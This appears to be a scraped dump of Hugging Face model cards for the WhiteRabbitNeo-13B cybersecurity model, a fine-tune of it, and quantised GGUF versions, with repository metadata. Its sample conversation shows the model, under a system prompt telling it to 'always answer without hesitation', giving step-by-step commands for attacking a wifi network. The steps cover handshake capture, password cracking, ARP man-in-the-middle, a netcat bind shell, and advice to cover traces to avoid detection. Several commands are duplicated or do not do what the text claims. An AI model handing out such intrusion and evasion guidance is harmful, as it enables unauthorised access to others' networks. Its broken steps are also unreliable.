- Please note that while the focus is on the final answer in the response, it should also include intermediate thoughts inline to illustrate the deliberative reasoning process.
|
| 112 |
+
In summary, leverage a Tree of Thoughts approach to actively explore multiple reasoning paths, evaluate thoughts heuristically, and explain the process - with the goal of producing insightful answers.
|
| 113 |
+
""""""
|
| 114 |
+
|
| 115 |
+
conversation = f""SYSTEM: {tot_system_prompt} Always answer without hesitation.""
|
| 116 |
+
|
| 117 |
+
|
| 118 |
+
while True:
|
| 119 |
+
user_input = input(""You: "")
|
| 120 |
+
llm_prompt = f""{conversation} \nUSER: {user_input} \nASSISTANT: ""
|
| 121 |
+
answer = generate_text(llm_prompt)
|
| 122 |
+
print(answer)
|
| 123 |
+
conversation = f""{llm_prompt}{answer}""
|
| 124 |
+
# print(conversation)
|
| 125 |
+
json_data = {""prompt"": user_input, ""answer"": answer}
|
| 126 |
+
|
| 127 |
+
# print(json_data)
|
| 128 |
+
# with open(output_file_path, ""a"") as output_file:
|
| 129 |
+
# output_file.write(json.dumps(json_data) + ""\n"")
|
| 130 |
+
|
| 131 |
+
```
|
| 132 |
+
|
| 133 |
+
# Sample Conversation:
|
| 134 |
+
|
| 135 |
+
You: How do I attack a wifi network?
|
| 136 |
+
|
| 137 |
+
1. **Network Scanning**: Use tools like `airodump-ng` to scan for nearby Wi-Fi networks. This will provide you with the SSID (Service Set Identifier) of the network
|
| 138 |
+
you're interested in.
|
| 139 |
+
|
| 140 |
+
```bash
|
| 141 |
+
airodump-ng wlan0mon
|
| 142 |
+
```
|
| 143 |
+
|
| 144 |
+
2. **Network Capturing**: Once you have identified the target network, you can capture packets from it using the `airodump-ng` tool. This will allow you to capture handshake packets which are necessary for further attacks.
|
| 145 |
+
|
| 146 |
+
```bash
|
| 147 |
+
airodump-ng --bssid [Target BSSID] -c [Channel] --write [Output File] wlan0mon
|
| 148 |
+
```
|
| 149 |
+
|
| 150 |
+
3. **Handshake Capture**: Wait for a client to connect to the network and capture the 4-way handshake. This will allow you to crack the network's password using tools like `aircrack-ng`.
|
| 151 |
+
|
| 152 |
+
```bash
|
| 153 |
+
airodump-ng --bssid [Target BSSID] -c [Channel] --write [Output File] wlan0mon
|
| 154 |
+
```
|
| 155 |
+
|
| 156 |
+
4. **Password Cracking**: Once you have the handshake, use `aircrack-ng` to crack the password.
|
| 157 |
+
|
| 158 |
+
```bash
|
| 159 |
+
aircrack-ng [Captured Handshake File]
|
| 160 |
+
```
|
| 161 |
+
|
| 162 |
+
5. **Session Establishment**: If you have the password, you can connect to the network using your wireless card.
|
| 163 |
+
|
| 164 |
+
```bash
|
| 165 |
+
iwconfig wlan0 essid [Network SSID] key [Network Password]
|
| 166 |
+
dhclient wlan0
|
| 167 |
+
```
|
| 168 |
+
|
| 169 |
+
6. **Network Exploitation**: Once connected, you can perform further attacks, such as sniffing traffic (`tcpdump`), or launching a man-in-the-middle attack using tools like `ettercap` or `arpspoof`.
|
| 170 |
+
|
| 171 |
+
```bash
|
| 172 |
+
tcpdump -i wlan0 -w [Packet Capture File]
|
| 173 |
+
ettercap -T -i [Interface] -M arp [Target IP]
|
| 174 |
+
```
|
| 175 |
+
|
| 176 |
+
7. **Post-Exploitation**: After gaining access to the network, you can exfiltrate data, execute commands, or perform other malicious activities.
|
| 177 |
+
|
| 178 |
+
```bash
|
| 179 |
+
nc -lvp [Local Port] -e /bin/bash
|
| 180 |
+
```
|
| 181 |
+
|
| 182 |
+
8. **Cleanup**: Remember to clean up any traces of your activities to avoid detection and legal consequences.
|
| 183 |
+
|
| 184 |
+
```bash
|
| 185 |
+
airmon-ng stop wlan0mon
|
| 186 |
+
```
|
| 187 |
+
|
| 188 |
+
Please note that all these steps should be performed in a legal and ethical manner, and only on networks you have permission to test. Unauthorized access to computer networks is illegal and unethical.
|
| 189 |
+
|
| 190 |
+
|
| 191 |
+
","{""id"": ""WhiteRabbitNeo/WhiteRabbitNeo-13B-v1"", ""author"": ""WhiteRabbitNeo"", ""sha"": ""5ecae8d533223436512e31edc3f56bced00265f1"", ""last_modified"": ""2024-02-15 17:03:54+00:00"", ""created_at"": ""2023-12-17 16:26:55+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 539, ""downloads_all_time"": null, ""likes"": 420, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""pytorch"", ""llama"", ""text-generation"", ""custom_code"", ""license:llama2"", ""autotrain_compatible"", ""text-generation-inference"", ""endpoints_compatible"", ""region:us""], ""pipeline_tag"": ""text-generation"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""license: llama2"", ""widget_data"": [{""text"": ""My name is Julien and I like to""}, {""text"": ""I like traveling by train because""}, {""text"": ""Paris is an amazing place to visit,""}, {""text"": ""Once upon a time,""}], ""model_index"": null, ""config"": {""architectures"": [""LlamaForCausalLM""], ""auto_map"": {""AutoConfig"": ""configuration_llama.LlamaConfig"", ""AutoModel"": ""modeling_llama.LlamaModel"", ""AutoModelForCausalLM"": ""modeling_llama.LlamaForCausalLM"", ""AutoModelForSequenceClassification"": ""modeling_llama.LlamaForSequenceClassification""}, ""model_type"": ""llama"", ""tokenizer_config"": {""bos_token"": ""<s>"", ""eos_token"": ""</s>"", ""pad_token"": ""</s>"", ""unk_token"": ""<unk>"", ""use_default_system_prompt"": true}}, ""transformers_info"": {""auto_model"": ""AutoModelForCausalLM"", ""custom_class"": null, ""pipeline_tag"": ""text-generation"", ""processor"": ""AutoTokenizer""}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='WhiteRabbitNeo.png', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='configuration_llama.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='generation_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='modeling_llama.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='pytorch_model-00001-of-00006.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='pytorch_model-00002-of-00006.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='pytorch_model-00003-of-00006.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='pytorch_model-00004-of-00006.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='pytorch_model-00005-of-00006.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='pytorch_model-00006-of-00006.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='pytorch_model.bin.index.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.model', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)""], ""spaces"": [""REDDNoC/whiterabbitneo-WhiteRabbitNeo-13B"", ""NexusInstruments/BlackHatRabbitNeo-13B-v1"", ""AdinEnvironment/whiterabbitneo-WhiteRabbitNeo-13B"", ""AdinEnvironment/WhiteRabbitNeo-Hacker-Chat"", ""holytinz278/MicroAi"", ""ototao/whiterabbitneo-WhiteRabbitNeo-13B"", ""shashithej/whiterabbitneo-WhiteRabbitNeo-13B"", ""Betacuckgpt/whiterabbitneo-WhiteRabbitNeo-13B"", ""ZENLLC/whiterabbitneo-WhiteRabbitNeo-13B"", ""Matinmollapur01/matinmollapur-WhiteRabbitNeo-13B"", ""AVHug/whiterabbitneo-WhiteRabbitNeo-13B"", ""Kiadee/neurolattice-WhiteRabbitNeo-13B-v1"", ""emilalvaro/neurolattice-WhiteRabbitNeo-13B-v1"", ""Kiadee/WhiteRabbitNeo-13B-v1"", ""sejamenath2023/WhiteRabbitNeo-WhiteRabbitNeo-13B-v1"", ""FGF897/WhiteRabbitNeo-WhiteRabbitNeo-13B-v1"", ""david6966/WhiteRabbitNeo-WhiteRabbitNeo-13B-v1"", ""sandy123sss/WhiteRabbitNeo-WhiteRabbitNeo-13B-v1"", ""Leroy0293/WhiteRabbitNeo-WhiteRabbitNeo-13B-v1"", ""sudoshellz/WhiteRabbitNeo-WhiteRabbitNeo-13B-v1"", ""procodec/WhiteRabbitNeo-WhiteRabbitNeo-13B-v1"", ""Facemaker/Hakingpt"", ""hiraetch72/WhiteRabbitNeo-WhiteRabbitNeo-13B-v1"", ""SunX45/NeoRabbitNeo"", ""bear222/WhiteRabbitNeo-WhiteRabbitNeo-13B-v1"", ""KazekageGARRA01/whiterabbitneo-WhiteRabbitNeo-13B"", ""holytinz278/Microais""], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2024-02-15 17:03:54+00:00"", ""cardData"": ""license: llama2"", ""transformersInfo"": {""auto_model"": ""AutoModelForCausalLM"", ""custom_class"": null, ""pipeline_tag"": ""text-generation"", ""processor"": ""AutoTokenizer""}, ""_id"": ""657f214f504da7f6f3e9641e"", ""modelId"": ""WhiteRabbitNeo/WhiteRabbitNeo-13B-v1"", ""usedStorage"": 52066287694}",0,"https://huggingface.co/Canstralian/text2shellcommands, https://huggingface.co/PrunaAI/WhiteRabbitNeo-WhiteRabbitNeo-13B-v1-GGUF-smashed",2,,0,"https://huggingface.co/TheBloke/WhiteRabbitNeo-13B-GGUF, https://huggingface.co/TheBloke/WhiteRabbitNeo-13B-GPTQ, https://huggingface.co/TheBloke/WhiteRabbitNeo-13B-AWQ, https://huggingface.co/MaziyarPanahi/WhiteRabbitNeo-13B-v1-GGUF, https://huggingface.co/mradermacher/WhiteRabbitNeo-13B-v1-GGUF, https://huggingface.co/mradermacher/WhiteRabbitNeo-13B-v1-i1-GGUF, https://huggingface.co/mradermacher/WhiteRabbitNeo-13B-GGUF, https://huggingface.co/mradermacher/WhiteRabbitNeo-13B-i1-GGUF, https://huggingface.co/wolflycanorcant/WhiteRabbitNeo-13B-v1-Q4_K_M-GGUF, https://huggingface.co/shinigami92g/WhiteRabbitNeo-13B-v1-Q4_0-GGUF",10,,0,"AVHug/whiterabbitneo-WhiteRabbitNeo-13B, AdinEnvironment/WhiteRabbitNeo-Hacker-Chat, AdinEnvironment/whiterabbitneo-WhiteRabbitNeo-13B, Betacuckgpt/whiterabbitneo-WhiteRabbitNeo-13B, Kiadee/neurolattice-WhiteRabbitNeo-13B-v1, Matinmollapur01/matinmollapur-WhiteRabbitNeo-13B, NexusInstruments/BlackHatRabbitNeo-13B-v1, REDDNoC/whiterabbitneo-WhiteRabbitNeo-13B, ZENLLC/whiterabbitneo-WhiteRabbitNeo-13B, holytinz278/MicroAi, huggingface/InferenceSupport/discussions/new?title=WhiteRabbitNeo/WhiteRabbitNeo-13B-v1&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5BWhiteRabbitNeo%2FWhiteRabbitNeo-13B-v1%5D(%2FWhiteRabbitNeo%2FWhiteRabbitNeo-13B-v1)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A, ototao/whiterabbitneo-WhiteRabbitNeo-13B, shashithej/whiterabbitneo-WhiteRabbitNeo-13B",13
|
| 192 |
+
Canstralian/text2shellcommands,"---
|
| 193 |
+
license: mit
|
| 194 |
+
datasets:
|
| 195 |
+
- Canstralian/ShellCommands
|
| 196 |
+
- Canstralian/CyberExploitDB
|
| 197 |
+
language:
|
| 198 |
+
- en
|
| 199 |
+
base_model:
|
| 200 |
+
- WhiteRabbitNeo/WhiteRabbitNeo-13B-v1
|
| 201 |
+
- replit/replit-code-v1_5-3b
|
| 202 |
+
library_name: transformers
|
| 203 |
+
tags:
|
| 204 |
+
- code
|
| 205 |
+
|
| 206 |
+
---
|
| 207 |
+
|
| 208 |
+
# Model Card for Model ID
|
| 209 |
+
|
| 210 |
+
This model card aims to document the capabilities, performance, and intended usage of models fine-tuned for cybersecurity tasks, including shell command parsing and cyber exploit detection. It is based on the underlying models WhiteRabbitNeo-13B-v1 and replit-code-v1_5-3b, fine-tuned on datasets related to shell commands and exploit databases.
|
| 211 |
+
|
| 212 |
+
## Model Details
|
| 213 |
+
|
| 214 |
+
### Model Description
|
| 215 |
+
This model is a fine-tuned version of large-scale language models optimized for tasks such as parsing shell commands and analyzing cybersecurity exploits. The training leverages datasets such as Canstralian/ShellCommands and Canstralian/CyberExploitDB to provide domain-specific knowledge.
|
| 216 |
+
|
| 217 |
+
**Developed by**: Canstralian
|
| 218 |
+
**Model type**: Transformer-based Language Model for cybersecurity applications
|
| 219 |
+
**Language(s) (NLP)**: English (en)
|
| 220 |
+
**License**: MIT
|
| 221 |
+
**Finetuned from model**: WhiteRabbitNeo/WhiteRabbitNeo-13B-v1, replit/replit-code-v1_5-3b
|
| 222 |
+
|
| 223 |
+
### Uses
|
| 224 |
+
|
| 225 |
+
#### Direct Use
|
| 226 |
+
The model is intended to be used directly for tasks like:
|
| 227 |
+
- Shell command understanding and classification
|
| 228 |
+
- Analyzing and classifying cybersecurity exploit patterns
|
| 229 |
+
- Assisting with code generation and debugging in a cybersecurity context
|
| 230 |
+
|
| 231 |
+
#### Downstream Use
|
| 232 |
+
When fine-tuned further, the model can be applied to:
|
| 233 |
+
- Automated incident response systems
|
| 234 |
+
- Security tool integration (e.g., for vulnerability scanners)
|
| 235 |
+
- Custom cybersecurity solutions tailored to enterprise needs
|
| 236 |
+
|
| 237 |
+
#### Out-of-Scope Use
|
| 238 |
+
The model is not designed for general-purpose natural language understanding outside of its specified cybersecurity domain. It may perform poorly or inaccurately for tasks outside of:
|
| 239 |
+
- Shell command parsing
|
| 240 |
+
- Exploit database analysis
|
| 241 |
+
- Code generation for cybersecurity applications
|
| 242 |
+
|
| 243 |
+
### Bias, Risks, and Limitations
|
| 244 |
+
This model may exhibit bias in the detection of certain exploits or shell commands, particularly if it encounters unfamiliar patterns not covered in the training data. Additionally, the model's predictions may be less accurate on unseen datasets or with edge cases that were not represented in the training data.
|
| 245 |
+
|
| 246 |
+
### Recommendations
|
| 247 |
+
- Users should be cautious when applying the model to novel or unverified exploits, as it may not handle new attack vectors well.
|
| 248 |
+
- Regular evaluation and testing in real-world environments are recommended before deploying the model in production.
|
| 249 |
+
|
| 250 |
+
### How to Get Started with the Model
|
| 251 |
+
Use the code below to get started with the model:
|
| 252 |
+
|
| 253 |
+
```python
|
| 254 |
+
from transformers import pipeline
|
| 255 |
+
|
| 256 |
+
# Load the pre-trained model
|
| 257 |
+
model_name = ""Canstralian/WhiteRabbitNeo-13B-v1-finetuned""
|
| 258 |
+
nlp = pipeline(""text-classification"", model=model_name)
|
| 259 |
+
|
| 260 |
+
# Example usage
|
| 261 |
+
result = nlp(""Example shell command or exploit input"")
|
| 262 |
+
print(result)
|
| 263 |
+
```
|
| 264 |
+
|
| 265 |
+
## Training Details
|
| 266 |
+
### Training Data
|
| 267 |
+
The model was fine-tuned on the following datasets:
|
| 268 |
+
|
| 269 |
+
- Canstralian/ShellCommands: A collection of shell commands used in cybersecurity contexts.
|
| 270 |
+
- Canstralian/CyberExploitDB: A curated set of known exploits and vulnerabilities.
|
| 271 |
+
Further details on the preprocessing of these datasets can be found in their respective dataset cards.
|
| 272 |
+
|
| 273 |
+
## Training Procedure
|
| 274 |
+
### Preprocessing
|
| 275 |
+
The data was preprocessed to remove any sensitive or personally identifiable information. Text normalization and tokenization were applied to ensure consistency across the datasets.
|
| 276 |
+
|
| 277 |
+
### Training Hyperparameters
|
| 278 |
+
Training regime: fp16 mixed precision
|
| 279 |
+
Evaluation
|
| 280 |
+
Testing Data, Factors & Metrics
|
| 281 |
+
Testing was performed on both synthetic and real-world shell command and exploit datasets, focusing on their ability to correctly parse shell commands and identify exploit signatures.
|
| 282 |
+
|
| 283 |
+
## Factors
|
| 284 |
+
The evaluation factors included:
|
| 285 |
+
|
| 286 |
+
Model performance across different types of shell commands and exploits.
|
| 287 |
+
Accuracy, precision, recall, and F1-score in detecting known exploits.
|
| 288 |
+
## Metrics
|
| 289 |
+
Metrics used for evaluation include:
|
| 290 |
+
|
| 291 |
+
- Accuracy: Percentage of correct predictions made by the model.
|
| 292 |
+
- Precision: The number of relevant instances among the retrieved instances.
|
| 293 |
+
- Recall: The number of relevant instances that were retrieved.
|
| 294 |
+
- F1-score: The harmonic mean of precision and recall.
|
| 295 |
+
## Results
|
| 296 |
+
The model performs well on standard shell command parsing tasks and exploit detection, with high accuracy for common exploits. However, its performance may degrade on newer or less common exploits.
|
| 297 |
+
|
| 298 |
+
## Summary
|
| 299 |
+
The model is well-suited for cybersecurity applications involving shell command and exploit detection. While it excels in these areas, users should monitor its performance for emerging threats and unusual attack patterns.
|
| 300 |
+
","{""id"": ""Canstralian/text2shellcommands"", ""author"": ""Canstralian"", ""sha"": ""960f3f15d5853777ba4592da7361e8bee95b21a8"", ""last_modified"": ""2025-01-01 01:35:47+00:00"", ""created_at"": ""2024-11-30 20:47:21+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 0, ""downloads_all_time"": null, ""likes"": 1, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""code"", ""en"", ""dataset:Canstralian/ShellCommands"", ""dataset:Canstralian/CyberExploitDB"", ""base_model:WhiteRabbitNeo/WhiteRabbitNeo-13B-v1"", ""base_model:finetune:WhiteRabbitNeo/WhiteRabbitNeo-13B-v1"", ""license:mit"", ""endpoints_compatible"", ""region:us""], ""pipeline_tag"": null, ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model:\n- WhiteRabbitNeo/WhiteRabbitNeo-13B-v1\n- replit/replit-code-v1_5-3b\ndatasets:\n- Canstralian/ShellCommands\n- Canstralian/CyberExploitDB\nlanguage:\n- en\nlibrary_name: transformers\nlicense: mit\ntags:\n- code"", ""widget_data"": null, ""model_index"": null, ""config"": null, ""transformers_info"": {""auto_model"": ""AutoModel"", ""custom_class"": null, ""pipeline_tag"": null, ""processor"": null}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='LICENSE.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='dataset_loader.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='datasets.yaml', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='main.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model..py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='requirements.txt', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='train.py', size=None, blob_id=None, lfs=None)""], ""spaces"": [""Chemically-motivated/RetroHackerTerminalUI""], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2025-01-01 01:35:47+00:00"", ""cardData"": ""base_model:\n- WhiteRabbitNeo/WhiteRabbitNeo-13B-v1\n- replit/replit-code-v1_5-3b\ndatasets:\n- Canstralian/ShellCommands\n- Canstralian/CyberExploitDB\nlanguage:\n- en\nlibrary_name: transformers\nlicense: mit\ntags:\n- code"", ""transformersInfo"": {""auto_model"": ""AutoModel"", ""custom_class"": null, ""pipeline_tag"": null, ""processor"": null}, ""_id"": ""674b79d91c5984922b542384"", ""modelId"": ""Canstralian/text2shellcommands"", ""usedStorage"": 0}",1,,0,,0,,0,,0,"Chemically-motivated/RetroHackerTerminalUI, huggingface/InferenceSupport/discussions/new?title=Canstralian/text2shellcommands&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5BCanstralian%2Ftext2shellcommands%5D(%2FCanstralian%2Ftext2shellcommands)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A",2
|
| 301 |
+
PrunaAI/WhiteRabbitNeo-WhiteRabbitNeo-13B-v1-GGUF-smashed,"---
|
| 302 |
+
thumbnail: ""https://assets-global.website-files.com/646b351987a8d8ce158d1940/64ec9e96b4334c0e1ac41504_Logo%20with%20white%20text.svg""
|
| 303 |
+
base_model: WhiteRabbitNeo/WhiteRabbitNeo-13B-v1
|
| 304 |
+
metrics:
|
| 305 |
+
- memory_disk
|
| 306 |
+
- memory_inference
|
| 307 |
+
- inference_latency
|
| 308 |
+
- inference_throughput
|
| 309 |
+
- inference_CO2_emissions
|
| 310 |
+
- inference_energy_consumption
|
| 311 |
+
tags:
|
| 312 |
+
- pruna-ai
|
| 313 |
+
---
|
| 314 |
+
<!-- header start -->
|
| 315 |
+
<!-- 200823 -->
|
| 316 |
+
<div style=""width: auto; margin-left: auto; margin-right: auto"">
|
| 317 |
+
<a href=""https://www.pruna.ai/"" target=""_blank"" rel=""noopener noreferrer"">
|
| 318 |
+
<img src=""https://i.imgur.com/eDAlcgk.png"" alt=""PrunaAI"" style=""width: 100%; min-width: 400px; display: block; margin: auto;"">
|
| 319 |
+
</a>
|
| 320 |
+
</div>
|
| 321 |
+
<!-- header end -->
|
| 322 |
+
|
| 323 |
+
[](https://twitter.com/PrunaAI)
|
| 324 |
+
[](https://github.com/PrunaAI)
|
| 325 |
+
[](https://www.linkedin.com/company/93832878/admin/feed/posts/?feedType=following)
|
| 326 |
+
[](https://discord.com/invite/vb6SmA3hxu)
|
| 327 |
+
|
| 328 |
+
## This repo contains GGUF versions of the WhiteRabbitNeo/WhiteRabbitNeo-13B-v1 model.
|
| 329 |
+
|
| 330 |
+
# Simply make AI models cheaper, smaller, faster, and greener!
|
| 331 |
+
|
| 332 |
+
- Give a thumbs up if you like this model!
|
| 333 |
+
- Contact us and tell us which model to compress next [here](https://www.pruna.ai/contact).
|
| 334 |
+
- Request access to easily compress your *own* AI models [here](https://z0halsaff74.typeform.com/pruna-access?typeform-source=www.pruna.ai).
|
| 335 |
+
- Read the documentations to know more [here](https://pruna-ai-pruna.readthedocs-hosted.com/en/latest/)
|
| 336 |
+
- Join Pruna AI community on Discord [here](https://discord.gg/rskEr4BZJx) to share feedback/suggestions or get help.
|
| 337 |
+
|
| 338 |
+
**Frequently Asked Questions**
|
| 339 |
+
- ***How does the compression work?*** The model is compressed with GGUF.
|
| 340 |
+
- ***How does the model quality change?*** The quality of the model output might vary compared to the base model.
|
| 341 |
+
- ***What is the model format?*** We use GGUF format.
|
| 342 |
+
- ***What calibration data has been used?*** If needed by the compression method, we used WikiText as the calibration data.
|
| 343 |
+
- ***How to compress my own models?*** You can request premium access to more compression methods and tech support for your specific use-cases [here](https://z0halsaff74.typeform.com/pruna-access?typeform-source=www.pruna.ai).
|
| 344 |
+
|
| 345 |
+
# Downloading and running the models
|
| 346 |
+
|
| 347 |
+
You can download the individual files from the Files & versions section. Here is a list of the different versions we provide. For more info checkout [this chart](https://gist.github.com/Artefact2/b5f810600771265fc1e39442288e8ec9) and [this guide](https://www.reddit.com/r/LocalLLaMA/comments/1ba55rj/overview_of_gguf_quantization_methods/):
|
| 348 |
+
|
| 349 |
+
| Quant type | Description |
|
| 350 |
+
|------------|--------------------------------------------------------------------------------------------|
|
| 351 |
+
| Q5_K_M | High quality, recommended. |
|
| 352 |
+
| Q5_K_S | High quality, recommended. |
|
| 353 |
+
| Q4_K_M | Good quality, uses about 4.83 bits per weight, recommended. |
|
| 354 |
+
| Q4_K_S | Slightly lower quality with more space savings, recommended. |
|
| 355 |
+
| IQ4_NL | Decent quality, slightly smaller than Q4_K_S with similar performance, recommended. |
|
| 356 |
+
| IQ4_XS | Decent quality, smaller than Q4_K_S with similar performance, recommended. |
|
| 357 |
+
| Q3_K_L | Lower quality but usable, good for low RAM availability. |
|
| 358 |
+
| Q3_K_M | Even lower quality. |
|
| 359 |
+
| IQ3_M | Medium-low quality, new method with decent performance comparable to Q3_K_M. |
|
| 360 |
+
| IQ3_S | Lower quality, new method with decent performance, recommended over Q3_K_S quant, same size with better performance. |
|
| 361 |
+
| Q3_K_S | Low quality, not recommended. |
|
| 362 |
+
| IQ3_XS | Lower quality, new method with decent performance, slightly better than Q3_K_S. |
|
| 363 |
+
| Q2_K | Very low quality but surprisingly usable. |
|
| 364 |
+
|
| 365 |
+
|
| 366 |
+
## How to download GGUF files ?
|
| 367 |
+
|
| 368 |
+
**Note for manual downloaders:** You almost never want to clone the entire repo! Multiple different quantisation formats are provided, and most users only want to pick and download a single file.
|
| 369 |
+
|
| 370 |
+
The following clients/libraries will automatically download models for you, providing a list of available models to choose from:
|
| 371 |
+
|
| 372 |
+
* LM Studio
|
| 373 |
+
* LoLLMS Web UI
|
| 374 |
+
* Faraday.dev
|
| 375 |
+
|
| 376 |
+
- **Option A** - Downloading in `text-generation-webui`:
|
| 377 |
+
- **Step 1**: Under Download Model, you can enter the model repo: WhiteRabbitNeo-WhiteRabbitNeo-13B-v1-GGUF-smashed and below it, a specific filename to download, such as: phi-2.IQ3_M.gguf.
|
| 378 |
+
- **Step 2**: Then click Download.
|
| 379 |
+
|
| 380 |
+
- **Option B** - Downloading on the command line (including multiple files at once):
|
| 381 |
+
- **Step 1**: We recommend using the `huggingface-hub` Python library:
|
| 382 |
+
```shell
|
| 383 |
+
pip3 install huggingface-hub
|
| 384 |
+
```
|
| 385 |
+
- **Step 2**: Then you can download any individual model file to the current directory, at high speed, with a command like this:
|
| 386 |
+
```shell
|
| 387 |
+
huggingface-cli download WhiteRabbitNeo-WhiteRabbitNeo-13B-v1-GGUF-smashed WhiteRabbitNeo-13B-v1.IQ3_M.gguf --local-dir . --local-dir-use-symlinks False
|
| 388 |
+
```
|
| 389 |
+
<details>
|
| 390 |
+
<summary>More advanced huggingface-cli download usage (click to read)</summary>
|
| 391 |
+
Alternatively, you can also download multiple files at once with a pattern:
|
| 392 |
+
|
| 393 |
+
```shell
|
| 394 |
+
huggingface-cli download WhiteRabbitNeo-WhiteRabbitNeo-13B-v1-GGUF-smashed --local-dir . --local-dir-use-symlinks False --include='*Q4_K*gguf'
|
| 395 |
+
```
|
| 396 |
+
|
| 397 |
+
For more documentation on downloading with `huggingface-cli`, please see: [HF -> Hub Python Library -> Download files -> Download from the CLI](https://huggingface.co/docs/huggingface_hub/guides/download#download-from-the-cli).
|
| 398 |
+
|
| 399 |
+
To accelerate downloads on fast connections (1Gbit/s or higher), install `hf_transfer`:
|
| 400 |
+
|
| 401 |
+
```shell
|
| 402 |
+
pip3 install hf_transfer
|
| 403 |
+
```
|
| 404 |
+
|
| 405 |
+
And set environment variable `HF_HUB_ENABLE_HF_TRANSFER` to `1`:
|
| 406 |
+
|
| 407 |
+
```shell
|
| 408 |
+
HF_HUB_ENABLE_HF_TRANSFER=1 huggingface-cli download WhiteRabbitNeo-WhiteRabbitNeo-13B-v1-GGUF-smashed WhiteRabbitNeo-13B-v1.IQ3_M.gguf --local-dir . --local-dir-use-symlinks False
|
| 409 |
+
```
|
| 410 |
+
|
| 411 |
+
Windows Command Line users: You can set the environment variable by running `set HF_HUB_ENABLE_HF_TRANSFER=1` before the download command.
|
| 412 |
+
</details>
|
| 413 |
+
<!-- README_GGUF.md-how-to-download end -->
|
| 414 |
+
|
| 415 |
+
<!-- README_GGUF.md-how-to-run start -->
|
| 416 |
+
|
| 417 |
+
## How to run model in GGUF format?
|
| 418 |
+
- **Option A** - Introductory example with `llama.cpp` command
|
| 419 |
+
|
| 420 |
+
Make sure you are using `llama.cpp` from commit [d0cee0d](https://github.com/ggerganov/llama.cpp/commit/d0cee0d36d5be95a0d9088b674dbb27354107221) or later.
|
| 421 |
+
|
| 422 |
+
```shell
|
| 423 |
+
./main -ngl 35 -m WhiteRabbitNeo-13B-v1.IQ3_M.gguf --color -c 32768 --temp 0.7 --repeat_penalty 1.1 -n -1 -p ""<s>[INST] {{prompt\}} [/INST]""
|
| 424 |
+
```
|
| 425 |
+
|
| 426 |
+
Change `-ngl 32` to the number of layers to offload to GPU. Remove it if you don't have GPU acceleration.
|
| 427 |
+
|
| 428 |
+
Change `-c 32768` to the desired sequence length. For extended sequence models - eg 8K, 16K, 32K - the necessary RoPE scaling parameters are read from the GGUF file and set by llama.cpp automatically. Note that longer sequence lengths require much more resources, so you may need to reduce this value.
|
| 429 |
+
|
| 430 |
+
If you want to have a chat-style conversation, replace the `-p <PROMPT>` argument with `-i -ins`
|
| 431 |
+
|
| 432 |
+
For other parameters and how to use them, please refer to [the llama.cpp documentation](https://github.com/ggerganov/llama.cpp/blob/master/examples/main/README.md)
|
| 433 |
+
|
| 434 |
+
- **Option B** - Running in `text-generation-webui`
|
| 435 |
+
|
| 436 |
+
Further instructions can be found in the text-generation-webui documentation, here: [text-generation-webui/docs/04 ‐ Model Tab.md](https://github.com/oobabooga/text-generation-webui/blob/main/docs/04%20-%20Model%20Tab.md#llamacpp).
|
| 437 |
+
|
| 438 |
+
- **Option C** - Running from Python code
|
| 439 |
+
|
| 440 |
+
You can use GGUF models from Python using the [llama-cpp-python](https://github.com/abetlen/llama-cpp-python) or [ctransformers](https://github.com/marella/ctransformers) libraries. Note that at the time of writing (Nov 27th 2023), ctransformers has not been updated for some time and is not compatible with some recent models. Therefore I recommend you use llama-cpp-python.
|
| 441 |
+
|
| 442 |
+
### How to load this model in Python code, using llama-cpp-python
|
| 443 |
+
|
| 444 |
+
For full documentation, please see: [llama-cpp-python docs](https://abetlen.github.io/llama-cpp-python/).
|
| 445 |
+
|
| 446 |
+
#### First install the package
|
| 447 |
+
|
| 448 |
+
